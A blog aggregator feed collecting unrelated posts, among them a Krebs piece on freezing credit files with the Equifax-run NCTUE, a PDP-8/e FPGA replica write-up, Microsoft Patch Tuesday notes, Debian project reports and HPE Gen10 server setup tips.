On May 7, when I visited the NCTUE’s page for freezing my credit file with them I was presented with the very same connection SSL security alert from Chrome, warning of an invalid Symantec certificate and that any data I shared with the NCTUE’s freeze page would not be encrypted in transit.

The security alert generated by Chrome when visiting the freeze page for the NCTUE, whose database (and apparently web site) also is run by Equifax.

When I clicked through past the warnings and proceeded to the insecure NCTUE freeze form (which is worded and stylized almost exactly like Equifax’s credit freeze page), I filled out the required information to freeze my NCTUE file. See if you can guess what happened next.

Yep, I was unceremoniously declined the opportunity to do that. “We are currently unable to service your request,” read the resulting Web page, without suggesting alternative means of obtaining its report. “Please try again later.”

The message I received after trying to freeze my file with the NCTUE.

This scenario will no doubt be familiar to many readers who tried (and failed in a similar fashion) to file freezes on their credit files with Equifax after the company divulged that hackers had relieved it of Social Security numbers, addresses, dates of birth and other sensitive data on nearly 150 million Americans last September. I attempted to file a freeze via the NCTUE’s site with no fewer than three different browsers, and each time the form reset itself upon submission or took me to a failure page.

So let’s review. Many people who have succeeded in freezing their credit files with Equifax have nonetheless had their identities stolen and new accounts opened in their names thanks to a lesser-known credit bureau that seems to rely entirely on credit checking entities operated by Equifax.

“This just reinforces the fact that we are no longer in control of our information,” said Kerskie, who is also a founding member of Griffon Force, a Florida-based identity theft restoration firm.

I find it difficult to disagree with Kerskie’s statement. What chaps me about this discovery is that countless Americans are in many cases plunking down $3-$10 per bureau to freeze their credit files, and yet a huge player in this market is able to continue to profit off of identity theft on those same Americans.

EQUIFAX RESPONDS

I asked Equifax why the very same credit bureau operating the NCTUE’s data exchange (and those of at least two other contributing members) couldn’t detect when consumers had placed credit freezes with Equifax. Put simply, Equifax’s wall of legal verbiage below says mainly that NCTUE is a separate entity from Equifax, and that NCTUE doesn’t include Equifax credit information.

Here is Equifax’s full statement on the matter:

·        The National Consumer Telecom and Utilities Exchange, Inc. (NCTUE) is a nationwide, member-owned and operated, FCRA-compliant consumer reporting agency that houses both positive and negative consumer payment data reported by its members, such as new connect requests, payment history, and historical account status and/or fraudulent accounts.  NCTUE members are providers of telecommunications and pay/satellite television services to consumers, as well as utilities providing gas, electrical and water services to consumers. 

·        This information is available to NCTUE members and, on a limited basis, to certain other customers of NCTUE’s contracted exchange operator, Equifax Information Services, LLC (Equifax) – typically financial institutions and insurance providers.  NCTUE does not include Equifax credit information, and Equifax is not a member of NCTUE, nor does Equifax own any aspect of NCTUE.  NCTUE does not provide telecommunications pay/ satellite television or utility services to consumers, and consumers do not apply for those services with NCTUE.

·        As a consumer reporting agency, NCTUE places and lifts security freezes on consumer files in accordance with the state law applicable to the consumer.  NCTUE also maintains a voluntary security freeze program for consumers who live in states which currently do not have a security freeze law. 

·        NCTUE is a separate consumer reporting agency from Equifax and therefore a consumer would need to independently place and lift a freeze with NCTUE.

·        While state laws vary in the manner in which consumers can place or lift a security freeze (temporarily or permanently), if a consumer has a security freeze on his or her NCTUE file and has not temporarily lifted the freeze, a creditor or other service provider, such as a mobile phone provider, generally cannot access that consumer’s NCTUE report in connection with a new account opening.  However, the creditor or provider may be able to access that consumer’s credit report from another consumer reporting agency in order to open a new account, or decide to open the account without accessing a credit report from any consumer reporting agency, such as NCTUE or Equifax. 

PLACING THE FREEZE

I was able to successfully place a freeze on my NCTUE report by calling their 800-number — 1-866-349-5355. The message said the NCTUE might charge a fee for placing or lifting the freeze, in accordance with state freeze laws.

Depending on your state of residence, the cost of placing a freeze on your credit file at Equifax, Experian or Trans Union can run between $3 and $10 per credit bureau, and in many states the bureaus also can charge fees for temporarily “thawing” and removing a freeze (according to a list published by Consumers Union, residents of four states — Indiana, Maine, North Carolina, South Carolina — do not need to pay to place, thaw or lift a freeze).

While my home state of Virginia allows the bureaus to charge $10 to place a freeze, for whatever reason the NCTUE did not assess that fee when I placed my freeze request with them. When and if your freeze request does get approved using the NCTUE’s automated phone system, make sure you have pen and paper or a keyboard handy to jot down the freeze PIN, which you will need in the event you ever wish to lift the freeze. When the system read my freeze PIN, it was read so quickly that I had to hit “*” on the dial pad several times to repeat the message.

It’s frankly absurd that consumers should ever have to pay to freeze their credit files at all, and yet a recent study indicates that almost 20 percent of Americans chose to do so at one or more of the three major credit bureaus since Equifax announced its breach last fall. The total estimated cost to consumers in freeze fees? $1.4 billion.

A bill in the U.S. Senate that looks likely to pass this year would require credit-reporting firms to let consumers place a freeze without paying. The free freeze component of the bill is just a tiny provision in a much larger banking reform bill — S. 2155 — that consumer groups say will roll back some of the consumer and market protections put in place after the Great Recession of the last decade.

“It’s part of a big banking bill that has provisions we hate,” said Chi Chi Wu, a staff attorney with the National Consumer Law Center. “It has some provisions not having to do with credit reporting, such as rolling back homeowners disclosure act provisions, changing protections in [current law] having to do with systemic risk.”

Sen. Jack Reed (D-RI) has offered a bill (S. 2362) that would invert the current credit reporting system by making all consumer credit files frozen by default, forcing consumers to unfreeze their files whenever they wish to obtain new credit. Meanwhile, several other bills would impose slightly less dramatic changes to the consumer credit reporting industry.

Wu said that while S. 2155 appears steaming toward passage, she doubts any of the other freeze-related bills will go anywhere.

“None of these bills that do something really strong are moving very far,” she said.

I should note that NCTUE does offer freeze alternatives. Just like with the big four, NCTUE lets consumers place a somewhat less restrictive “fraud alert” on their file indicating that verbal permission should be obtained over the phone from a consumer before a new account can be opened in their name.

Here is a primer on freezing your credit file with the big three bureaus, including Innovis. This tutorial also includes advice on placing a security alert at ChexSystems, which is used by thousands of banks to verify customers that are requesting new checking and savings accounts. In addition, consumers can opt out of pre-approved credit offers by calling 1-888-5-OPT-OUT (1-888-567-8688), or visit optoutprescreen.com.

Oh, and if you don’t want Equifax sharing your salary history over the life of your entire career, you might want to opt out of that program as well.

Equifax and its ilk may one day finally be exposed for the digital dinosaurs that they are. But until that day, if you care about your identity you now may have another freeze to worry about. And if you decide to take the step of freezing your file at the NCTUE, please sound off about your experience in the comments below.

Planet DebianAndreas Bombe: PDP-8/e Replicated — Clocks And Logic

This is, at long last, part 3 of the overview of my PDP-8/e replica project and offers some details of the low-level implementation.

I have mentioned that I build my PDP-8/e replica from the original schematics. The great thing about the PDP-8/e is that it is still built in discrete logic rather than around a microprocessor, meaning that schematics of the actual CPU logic are available instead of just programmer’s documentation. After all, with so many chips on multiple boards something is bound to break down sooner or later and technicians need schematics to diagnose and fix that1. In addition, there’s a maintenance manual that very helpfully describes the workings of every little part of the CPU with excerpts of the full schematics, but it has some inaccuracies and occasionally outright errors in the excerpts so the schematics are still indispensable.

Originally I wanted to design my own logic and use the schematics as just another reference. Since the front panel is a major part of the project and I want it to visually behave as close as possible to the real thing, I would have to duplicate the cycles exactly and generally work very close to the original design. I decided that at that point I might as well just reimplement the schematics.

However, some things can not be reimplemented exactly in the FPGA, other things are a bad fit and can be improved significantly with slight changes.

Clocks

Back in the day, the rule for digital circuits was multi-phase clocks of varying complexity, and the PDP-8/e is no exception in that regard. A cycle has four timing states of different lengths that each end on a timing pulse.

timing diagram from the "pdp8/e & pdp8/m small computer handbook 1972"

As can be seen, the timing states are active when they are at low voltage while the timing pulses are active high. There are plenty of quirks like this which I describe below in the Logic section.

In the PDP-8 the timing generator was implemented as a circular chain of shift registers with parallel outputs. At power on, these registers are reset to all 1 except for 0 in the first two bits. The shift operation is driven by a 20 MHz clock2 and the two zeros then circulate while logic combinations of the parallel outputs generate the timing signals (and also core memory timing, not shown in the diagram above).
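As a toy illustration of that scheme (a Python behavioural model, not the replica's actual HDL, and with a shortened chain rather than the real register length):

# Toy model of the circulating shift register timing chain.
# CHAIN_LEN and the decode below are simplified placeholders; the real
# PDP-8/e chain is longer and decodes TS1-TS4, TP1-TP4 and the core
# memory timing from its parallel outputs.
CHAIN_LEN = 8
chain = [0, 0] + [1] * (CHAIN_LEN - 2)      # power-on reset: two zeros, the rest ones

def tick(chain):
    """One 20 MHz clock edge: rotate the register so the two zeros circulate."""
    return [chain[-1]] + chain[:-1]

for cycle in range(2 * CHAIN_LEN):
    tp_example = (chain[3] == 0)            # e.g. a "pulse" decoded from one parallel output
    print(cycle, "".join(str(b) for b in chain), "TP" if tp_example else "")
    chain = tick(chain)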

What happens with these signals is that the timing states together with control signals decoded from instructions select data outputs and paths while the associated timing pulse combined with timing state and instruction signals trigger D type flip-flops to save these results and present it on their outputs until they are next triggered with different input data.

Relevant for D type flip-flops is the rising edge of their clock input. The length of the pulse does not matter as long as it is not shorter than a required minimum. For example the accumulator register needs to be loaded at TP3 during major state E for a few different instructions. Thus the AC LOAD signal is generated as TP3 and E and (TAD instruction or AND instruction or …) and that signal is used as the clock input for all twelve flip-flops that make up the accumulator register.

However, having flip-flops clocked off timing pulses that are combined with different amounts of logic creates differences between sample times, which in turn makes it hard to push that kind of design to high cycle frequencies. Basically all modern digital circuits are synchronous. There, all flip-flops are clocked directly off the same global clock and get triggered at the same time. Since of course not all flip-flops should get new values at every cycle, they have an additional enable input so that the rising clock edge will only register new data when enable is also true3.

Naturally, FPGAs are tailored to this design paradigm. They have (a limited number of) dedicated clock distribution networks set apart from the regular signal routing resources, to provide low skew clock signals across the device. Groups of logic elements get only a very limited set of clock inputs for all their flip-flops. While it is certainly possible to run the same scheme as the original in an FPGA, it would be an inefficient use of resources and very likely make automated timing analysis difficult by requiring lots of manual specification of clock relationships between registers.

So while I do use 20 MHz as the base clock in my timing generator and generate the same signals in my design, I also provide this 20 MHz as the common clock to all logic. Instead of registers triggering on the rising edges of the timing pulses, they get the timing pulses as enables. One difference resulting from that is that registers aren’t triggered by the rising edge of a pulse anymore but will trigger on every clock cycle where the pulse is active. The original pulses are two clock cycles long and extend into the following time state, so the correct data they picked up on the first cycle would be overwritten by wrong data on the second. I simply shortened the timing pulses to one clock cycle to adapt to this.
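To make that last point concrete, here is a toy Python sketch (my own illustration, not the author’s VHDL) of an enable-gated register; the pulse and data sequences are invented just to show why a two-cycle pulse would latch the wrong value:

# Toy model of a register with a clock enable, evaluated once per clock cycle.
def simulate(pulse, data):
    reg = None
    history = []
    for enable, d in zip(pulse, data):
        if enable:        # the timing pulse acts as the enable
            reg = d       # the register loads on every enabled clock cycle
        history.append(reg)
    return history

# Two-cycle pulse: the good value picked up on the first cycle is
# overwritten by the following time state's data on the second cycle.
print(simulate(pulse=[0, 1, 1, 0], data=["x", "good", "bad", "x"]))
# One-cycle pulse (the shortening described above): the good value is kept.
print(simulate(pulse=[0, 1, 0, 0], data=["x", "good", "bad", "x"]))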

timing signals from simulation showing long and fast cycle

To reiterate, this is all in the interest of matching the original timing exactly. Analysis by the synthesis tool shows that I could easily push the base clock well over twice the current speed, and that’s already with it assuming that everything has to settle within one clock cycle as I’ve not specified multicycle paths. That means I could shorten the timing states to a single cycle4 for an overall more than 10× acceleration on the lowest speed grade of the low-end FPGA I’m using.

Logic

To save on logic, many parts with open collector outputs were used in the PDP-8. Instead of driving high or low voltage to represent zeros and ones, an open collector only drives either low voltage or leaves the line alone. Many outputs can then be simply connected together as they can’t drive conflicting voltages. Return to high voltage in the absence of outputs driving low is accomplished by a resistor to positive supply somewhere on the signal line.

The effect is that the connection of outputs itself forms a logic combination in that the signal is high when none of the gates drive low and it’s low when any number of gates drive low. Combining that with active low signalling, where a low voltage represents active or 1, the result is a logical OR combination of all outputs (called wired OR since no logic gates are involved).

The designers of the PDP-8/e made extensive use of that. The majority of signals are active low, marked with L after their name in the schematics. Some signals don’t have multiple sources and can be active high where it’s more convenient, those are marked with H. And then there are many signals that carry no indication at all and some that miss the indication in the maintenance manual just to make a reimplementer’s life more interesting.

excerpt from the PDP-8/e CPU schematic, generation of the accumulator load (AC LOAD L) signal can be seen on the right

As an example in this schematic, let’s look at AC LOAD L which triggers loading the accumulator register from the major registers bus. It’s a wired OR of two NAND outputs, both in the chip labeled E15, and with pull-up resistor R12 to +5 V. One NAND combines BUS STROBE and C2, the other TP3 and an OR in chip E7 of a bunch of instruction related signals. For comparison, here’s how I implemented it in VHDL:

-- active-high reimplementation of the wired-OR AC LOAD L signal from the schematic excerpt above
ac_load <= (bus_strobe and not c2) or
           (TP3 and E and ir_TAD) or
           (TP3 and E and ir_AND) or
           (TP3 and E and ir_DCA) or
           (TP3 and F and ir_OPR);

FPGAs don’t have internal open collector logic5 and any output of a logic gate must be the only one driving a particular line. As a result, all the wired OR must be implemented with explicit ORs. Without the need to have active low logic I consistently use active high everywhere, meaning that the logic in my implementation is mostly inverted compared to the real thing. The deviation of ANDing TP3 with every signal instead of just once with the result of the OR is again due to consistency: I use the “<timing> and <major state> and <instruction signal>” pattern a lot.

One difficulty with wired OR is that it is never quite obvious from a given section of the schematics what all inputs to a given gate are. You may have a signal X being generated on one page of the schematic and a line with signal X as an input to a gate on another page, but that doesn’t mean there isn’t something on yet another page also driving it, or that it isn’t also present on a peripheral port6.

Some of the original logic is needed only for electrical reasons, such as buffers which are logic gates that do not combine multiple inputs but simply repeat their inputs (maybe inverted). Logic gate outputs can only drive so many inputs, so if one signal is widely used it needs buffers. Inverters are commonly used for that in the PDP-8. BUS STROBE above is one example, it is the inverted BUS STROBE L found on the backplane. Another is BTP3 (B for buffered) which is TP3 twice inverted.

Finally, some additional complexity is owed to the fact that the 8/e is made of discrete logic chips and that these have multiple gates in a package, for example the 7401 with four 2-input NAND gates with open collector outputs per chip. In designing the 8/e, logic was sometimes not implemented straightforwardly but as more complicated equivalents if that meant unused gates in existing chips could be used rather than adding more chips.

Summary

I started out saying that I am building an exact PDP-8/e replica from the schematics. As I have detailed, that doesn’t involve just taking every gate and its connections from the schematic and writing it down in VHDL. I am changing the things that cannot be directly implemented in an FPGA (like wired OR) and leaving out things that are not needed in this environment (such as buffers). Nevertheless, the underlying logic stays the same and as a result my implementation has the exact same timing and behaviour even in corner cases.

Ultimately all this only applies to the CPU and closely associated units (arithmetic and address extension). Moving out to peripheral hardware, the interface to the CPU may be the only part that could be implemented from original schematics. After all, where the magnetic tape drive interface in the original was controlling the actual tape hardware, the equivalent in the replica project would be accessing emulated tape storage.

This finally concludes the overview of my project. Its development hasn’t advanced as much as I expected around this time last year, since I ended up putting the project aside for a long while. After returning to it, running the MAINDEC test programs revealed a bunch of stuff I forgot to implement or implemented wrong, which I had to fix. The optional Extended Arithmetic Element isn’t implemented yet, while the Memory Extension & Time Share is now complete apart from some test failures I still need to debug. It is now reaching a state where I consider the design getting ready to be published.


  1. There are also test programs that exercise and check every single logic gate to help pinpoint a problem. Naturally they are also extremely helpful with verifying that a replica is in fact working exactly like the real thing. [return]
  2. Thus 50 ns, one cycle of the 20 MHz clock, is the granularity at which these signals are created. The timing pulses, for example, are 100 ns long. [return]
  3. This is simply implemented by presenting them their own output by a feedback path when enable is false so that they reload their existing value on the clock edge. [return]
  4. In fact I would be limited by the speed of the external SRAM I use and its 6 bit wide data connection, requiring two cycles for a 12 bit access. [return]
  5. The IO pins that interface to the outside world generally have the capability to switch to a disconnected state at run time, allowing open collector and similar signaling. [return]
  6. Besides the memory and expansion bus, the 8/e CPU also has a special interface to attach the Extended Arithmetic Element. [return]

Cory DoctorowTalking privacy and GDPR with Thomson Reuters

Thomson Reuters interviewed me for their new series on data privacy and the EU General Data Protection Regulation; here’s the audio!


What if you just said when you breach, the damages that you owe to the people whose data you breached cannot be limited to the immediate cognizable consequences of that one breach but instead have to take recognition of the fact that breaches are cumulative? That the data that you release might be merged with some other set that was previously released either deliberately by someone who thought that they’d anonymized it because key identifiers had been removed that you’ve now added back in or accidentally through another breach? The merger of those two might create a harm.

Now you can re-identify a huge number of those prescriptions. That might create all kinds of harms that are not immediately apparent just by releasing a database of people’s rides, but when merged with maybe that NIH or NHS database suddenly becomes incredibly toxic and compromising.

If for example we said, “Okay, in recognition of this fact that once that data is released it never goes away, and each time it’s released it gets merged with other databases to create fresh harms that are unquantifiable in this moment and should be assumed to exceed any kind of immediate thing that we can put our finger on, that you have to pay fairly large statutory damages if you’re found to have mishandled data.” Well, now I think the insurance companies are going to do a lot of our dirty work for us.

We don’t have to come up with rules. We just have to wait for the insurance companies to show up at these places that they’re writing policies for and say, “Tell me again, why we should be writing you a policy when you’ve warehoused all of this incredibly toxic material that we’re all pretty sure you’re going to breach someday, and whose liability is effectively unbounded?” They’re going to make the companies discipline themselves.

Worse Than FailureExponential Backup

The first day of a new job is always an adjustment. There's a fine line between explaining that you're unused to a procedure and constantly saying "At my old company...". After all, nobody wants to be that guy, right? So you proceed with caution, trying to learn before giving advice.

But some things warrant the extra mile. When Samantha started her tenure at a mid-sized firm, it all started out fine. She got a computer right away, which is a nice plus. She met the team, got settled into a desk, and was given a list of passwords and important URLs to get situated. The usual stuff.

After changing her Windows password, she decided to start by browsing the source code repository. This company used Subversion, so she went and downloaded the whole repo so she could see the structure. It took a while, so she got up and got some coffee; when she got back, it had finished, and she was able to see the total size: 300 GB. That's... weird. Really weird. Weirder still, when she glanced over the commit history, it only dated back a year or so.

What could be taking so much space? Were they storing some huge binaries tucked away someplace that the code depended on? She didn't want to make waves, but this just seemed so... inefficiently huge. Now curious, she opened the repo, browsing the folder structure.

Subversion bases everything on folder structure; there is only really one "branch" in Git's thinking, but you can check out any subfolder without taking the whole repository. Inside of each project directory was a layout that is common to SVN repos: a folder called "branches", a folder called "tags", and a folder called "trunk" (Subversion's primary branch). In the branches directory there were folders called "fix" and "feature", and in each of those there were copies of the source code stored under the names of the branches. Under normal work, she'd start her checkout from one of those branch folders, thus only pulling down the code for her branch, and merge into the "trunk" copy when she was all done.

But there was one folder she didn't anticipate: "backups". Backups? But... this is version control. We can revert to an earlier version any time we want. What are the backups for? I must be misunderstanding. She opened one and was promptly horrified to find a series of zip files, dated monthly, all at revision 1.

Now morbidly curious, Samantha opened one of these zips. The top level folder inside the zip was the name of the project; under that, she found branches, tags, trunk. No way. They can't have-- She clicked in, and there it was, plain as day: another backups folder. And inside? Every backup older than the one she'd clicked. Each backup included, presumably, every backup prior to that, meaning that in the backup for October, the backup from January was included nine times, the backup from February eight times, and so on and so forth. Within two years, a floppy disk worth of code would fill a terabyte drive.
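For a rough sense of that growth, here is a quick back-of-the-envelope sketch in Python; the numbers and the doubling assumption are my own, not anything from the story. Each monthly backup zips the project plus every earlier backup, so the sizes roughly double each month.

FLOPPY_MB = 1.44          # "a floppy disk worth of code"
TERABYTE_MB = 1024 ** 2   # 1 TB expressed in MB

backups = []
month = 0
while sum(backups) + FLOPPY_MB < TERABYTE_MB:
    month += 1
    # this month's backup = the base code plus copies of all previous backups
    backups.append(FLOPPY_MB + sum(backups))

print("Repository passes 1 TB in month", month)   # roughly 20 months, i.e. under two years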

Samantha asked her boss, "What will you do when the repo gets too big to be downloaded onto your hard drive?"

His response was quick and entirely serious: "Well, we back it up, then we make a new one."

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

Planet DebianAlexandre Viau: Introducing Autodeb

Autodeb is a new service that will attempt to automatically update Debian packages to newer upstream versions or to backport them. Resulting packages will be distributed in apt repositories.

I am happy to announce that I will be developing this new service as part of Google Summer of Code 2018, with Lucas Nussbaum as a mentor.

The program is currently nearing the end of the “Community Bonding” period, where mentors and their mentees discuss the details of the projects and try to set objectives.

Main goal

Automatically create and distribute package updates/backports

This is the main objective of Autodeb. These unofficial packages can be an alternative for Debian users who want newer versions of software sooner than they are available in Debian.

The results of this experiment will also be interesting when looking at backports. If successful, it could be that a large number of packages are backportable automatically, bringing even more options for stable (or even oldstable) users.

We also hope that the information that is produced by the system can be used by Debian Developers. For example, Debian Developers may be more tempted to support backports of their packages if they know that it already builds and that the autopkgtests pass.

Other goals

Autodeb will be composed of infrastructure that is capable of building and testing a large number of packages. We intend to build it with two secondary goals in mind:

Test packages that were built by developers before they upload them to the archive

We intend to add a self-service interface so that our testing infrastructure can be used for other purposes than automatically updating packages. This can empower Debian Developers by giving them easy access to more rigorous testing before they upload a package to the archive. For more details on this, see my previous testeduploads proposal.

Archive rebuilds / modifying the build and test environment

We would like to allow for building packages with a custom environment, for example with a new version of GCC or with a specific set of packages. Ideally, this would also be a self-service interface where Developers can set up their environment and then upload packages for testing. Instead of individual package uploads, the input of packages to build could be a whole apt repository from which all source packages would be downloaded and rebuilt, with filters to select the packages to include or exclude.
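As an illustration of that last idea, a hypothetical Python sketch of the include/exclude filtering might look like the following. The Sources index format is standard Debian, but the function and its parameters are invented for this example and are not part of Autodeb.

import gzip
import re

def select_sources(sources_gz_path, include=None, exclude=None):
    """Return source package names from a Sources.gz index, filtered
    by optional lists of include/exclude regular expressions."""
    selected = []
    with gzip.open(sources_gz_path, "rt") as f:
        for stanza in f.read().split("\n\n"):
            match = re.search(r"^Package: (\S+)", stanza, re.MULTILINE)
            if not match:
                continue
            package = match.group(1)
            if include and not any(re.fullmatch(p, package) for p in include):
                continue
            if exclude and any(re.fullmatch(p, package) for p in exclude):
                continue
            selected.append(package)
    return selected

# e.g. rebuild everything except a few very large packages:
# select_sources("Sources.gz", exclude=[r"linux", r"gcc-\d+"])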

What’s next

The next phase of Google Summer of Code is the coding period; it begins on May 14 and ends on August 6. However, there are a number of areas where work has already begun:

  1. Main repository: code for the master and the worker components of the service, written in golang.
  2. Debian packaging: Debian packaging for autodeb. It contains scripts that will publish packages to pages.debian.net.
  3. Ansible scripts: this repository contains ansible scripts to provision the infrastructure at auto.debian.net.

Status update at DebConf

I have submitted a proposal for a talk on Autodeb at DebConf. By that time, the project should have evolved from idea to prototype and it will be interesting to discuss the things that we have learned:

  • How many packages can we successfully build?
  • How many of these packages fail tests?

If all goes well, it will also be an opportunity to officially present our self-service interface to the public so that the community can start using it to test packages.

In the meantime, feel free to get in touch with us by email, on OFTC at #autodeb, or via issues on salsa.

,

Krebs on SecurityMicrosoft Patch Tuesday, May 2018 Edition

Microsoft today released a bundle of security updates to fix at least 67 holes in its various Windows operating systems and related software, including one dangerous flaw that Microsoft warns is actively being exploited. Meanwhile, as it usually does on Microsoft’s Patch Tuesday — the second Tuesday of each month — Adobe has a new Flash Player update that addresses a single but critical security weakness.

First, the Flash Tuesday update, which brings Flash Player to v. 29.0.0.171. Some (present company included) would argue that Flash Player is itself “a single but critical security weakness.” Nevertheless, Google Chrome and Internet Explorer/Edge ship with their own versions of Flash, which get updated automatically when new versions of these browsers are made available.

You can check if your browser has Flash installed/enabled and what version it’s at by pointing your browser at this link. Adobe is phasing out Flash entirely by 2020, but most of the major browsers already take steps to hobble Flash. And with good reason: It’s a major security liability.

Google Chrome blocks Flash from running on all but a handful of popular sites, and then only after user approval. Disabling Flash in Chrome is simple enough. Paste “chrome://settings/content” into a Chrome browser bar and then select “Flash” from the list of items. By default it should be set to “Ask first” before running Flash, although users also can disable Flash entirely here or whitelist/blacklist specific sites. If you spot an upward pointing arrow to the right of the address bar in Chrome, that means there’s an update to the browser available, and it’s time to restart Chrome.

For Windows users with Mozilla Firefox installed, the browser prompts users to enable Flash on a per-site basis.

Through the end of 2017 and into 2018, Microsoft Edge will continue to ask users for permission to run Flash on most sites the first time the site is visited, and will remember the user’s preference on subsequent visits. Microsoft users will need to install this month’s batch of patches to get the latest Flash version for IE/Edge, where most of the critical updates in this month’s patch batch reside.

According to security vendor Qualys, one Microsoft patch in particular deserves priority over others in organizations that are testing updates before deploying them: CVE-2018-8174 involves a problem with the way the Windows scripting engine handles certain objects, and Microsoft says this bug is already being exploited in active attacks.

Some other useful sources of information on today’s updates include the Zero Day Initiative and Bleeping Computer. And of course there is always the Microsoft Security Update Guide.

As always, please feel free to leave a comment below if you experience any issues applying any of these updates.

Rondam RamblingsA quantum mechanics puzzle, part deux

This post is (part of) the answer to a puzzle I posed here.  Read that first if you haven't already. To make this discussion concrete, let's call the time it takes for light to traverse the short (or Small) arm of the interferometer Ts, the long (or Big) arm Tb (because Tl looks too much like T1). So there are five interesting cases here.  Let's start with the easy one: we illuminate the

Planet DebianSven Hoexter: Debian/stretch on HPE DL360 gen10

We received our first HPE gen10 systems, a bunch of DL360s, and hit a few caveats while setting up Debian/stretch.

PXE installation

While our DL120 gen9 systems announced themselves as "X86-64_EFI" (client architecture 00009), the DL360 gen10 use "BC_EFI" (client architecture 00007) in the BOOTP/DHCP protocol option 93. Since we use dnsmasq as DHCP and tftp server, we rely on tags like this:

# new style UEFI PXE
dhcp-boot=bootnetx64.efi
# client arch 00009
pxe-service=tag:s1,X86-64_EFI, "Boot UEFI X86-64_EFI", bootnetx64.efi
# client arch 00007
pxe-service=tag:s2,BC_EFI, "Boot UEFI BC_EFI", bootnetx64.efi

dhcp-host=set:s1,AB:CD:37:3A:2E:FG,192.168.1.5,host-001
dhcp-host=set:s2,AB:CD:37:3A:2H:IJ,192.168.1.6,host-002

This is easy to spot with wireshark once you understand what you're looking for.

debian-installer

For some reason, and I heard some rumours that this is a known bug, I had to disable USB support and the SD-card reader in the interface formerly known as BIOS. Otherwise the installer detects the first volume of the P408i raid controller as "/dev/sdb" instead of "/dev/sda".

Network interfaces depend highly on your actual setup. Booting from the additional 10G interfaces worked out of the box; they're detected with reliable names as eno5 and eno6.

HPE MCP

So far we relied on the hp-health and ssacli (formerly hpssacli) packages from the HPE MCP. Currently those tools seem not to support Gen10 systems. I'm currently trying to find out what the alternative is to monitor the health state of the system components. At least for hp-health it's mentioned that only systems up to Gen9 are supported.

That's what I receive from ssacli:

=> ctrl all show status

HPE P408i-a SR Gen10 in Slot 0 (Embedded)

APPLICATION UPGRADE REQUIRED: This controller has been configured with a more
                          recent version of software.
                          To prevent data loss, configuration changes to
                          this controller are not allowed.
                          Please upgrade to the latest version to be able
                          to continue to configure this controller.

That's what I found in our logs from the failed start of hpasmlited:

hpasmlited[31952]: check_ilo2: BMC Returned Error:  ccode  0x0,  Req. Len:  15, Resp. Len:  21

auto configuration

If you're looking into automatic configuration of those systems you'll have to look at Redfish. API documentation for ilo5 can be found at https://hewlettpackard.github.io/ilo-rest-api-docs/ilo5. Since it's not clear how many of those systems we will actually set up, I'm so far a bit reluctant to automate the setup further.
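For anyone curious what that looks like in practice, here is a minimal Python sketch of querying the Redfish API on an iLO 5; the host name and credentials are placeholders, and the exact resource paths may differ between firmware versions.

import requests

ILO_HOST = "https://ilo-host-001.example.com"   # placeholder iLO address

def get_system_summary(user, password):
    # /redfish/v1/Systems/1/ is the standard Redfish resource for the first system
    resp = requests.get(ILO_HOST + "/redfish/v1/Systems/1/",
                        auth=(user, password),
                        verify=False)   # iLOs usually ship with self-signed certificates
    resp.raise_for_status()
    data = resp.json()
    return {
        "model": data.get("Model"),
        "power": data.get("PowerState"),
        "health": data.get("Status", {}).get("Health"),
    }

print(get_system_summary("Administrator", "secret"))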

Planet DebianMarkus Koschany: My Free Software Activities in April 2018

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • I adopted childsplay, a suite of educational games for young children. I triaged all open bugs and thanks to a very responsive upstream developer the game is back in testing again now.
  • I did a QA upload for pax-britannica to fix #825673 and #718884 and updated the packaging.
  • In the same vein I did two NMUs for animals and acm and fixed RC bugs #875547 and #889530. Later I contacted the release team to get the fix for animals into Stretch too.
  • I packaged new upstream releases of extremetuxracer, adonthell, renpy and pygame-sdl2.
  • I sponsored and reviewed new versions of tanglet, connectagram and cutemaze for Innocent de Marchi.
  • I released version 2.3 of debian-games, a collection of metapackages to make it easier to find and install certain types of games.
  • I backported the latest release of freeciv to Stretch.
  • Finally I could resolve the RC bugs in morris and grhino and both games are part of Buster again.

Debian Java

Debian LTS

This was my twenty-sixth month as a paid contributor and I have been paid to work 16.25 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 16.04.2018 until 22.04.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVEs in bouncycastle, jruby, typo3-src, imagemagick, pegl, ocaml, radare2, movabletype-opensource, cacti, ghostscript, glusterfs, jasperreports, xulrunner, phpmyadmin, gunicorn, psensor, nasm and lucene-solr.
  • DLA-1352-1. Issued a security update for jruby fixing 1 CVE.
  • DLA-1361-1. Issued a security update for psensor fixing 1 CVE.
  • DLA-1363-1. Issued a security update for ghostscript fixing 1 CVE.
  • DLA-1366-1. Issued a security update for wordpress fixing 2 CVE.
  • DSA-4190-1. Prepared the security update for jackson-databind in Jessie fixing 1 CVE.
  • DSA-4194-1. Prepared the security update for lucene-solr in Jessie fixing 1 CVE.
  • Prepared a security update for imagemagick in Jessie fixing 8 CVE. At the moment it is pending review by the security team and will be released soon.
  • Prepared and uploaded a point-update for faad2 in Jessie and Stretch that addresses 11 security vulnerabilities. (#897369)
  • Prepared a security update for php5 in Wheezy. This one will be released soon. (DLA-1373-1)

Misc

  • I filed wishlist bugs against tracker.debian.org (#897225 and #897227) and requested a feature to allow users to override certain metainformation like VCS URLs. In the past years we changed VCS addresses multiple times, which always requires a source upload. In my opinion this is a design flaw and highly inefficient, and such a change in tracker would make it possible to drop the fields from our team-maintained packages.

Thanks for reading and see you next time.

Planet DebianReproducible builds folks: Reproducible Builds: Weekly report #158

Here’s what happened in the Reproducible Builds effort between Sunday April 29 and Saturday May 5 2018:

Packages reviewed and fixed, and bugs filed

Misc.

This week’s edition was written by Chris Lamb & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Mark ShuttleworthCue the Cosmic Cuttlefish

With our castor now out for all to enjoy, and the Twitterverse delighted with the new minimal desktop and smooth snap integration, it’s time to turn our attention to the road ahead to 20.04 LTS, and I’m delighted to say that we’ll kick off that journey with the Cosmic Cuttlefish, soon to be known as Ubuntu 18.10.

Each of us has our own ideas of how the free stack will evolve in the next two years. And the great thing about Ubuntu is that it doesn’t reflect just one set of priorities, it’s an aggregation of all the things our community cares about. Nevertheless I thought I’d take the opportunity early in this LTS cycle to talk a little about the thing I’m starting to care more about than any one feature, and that’s security.

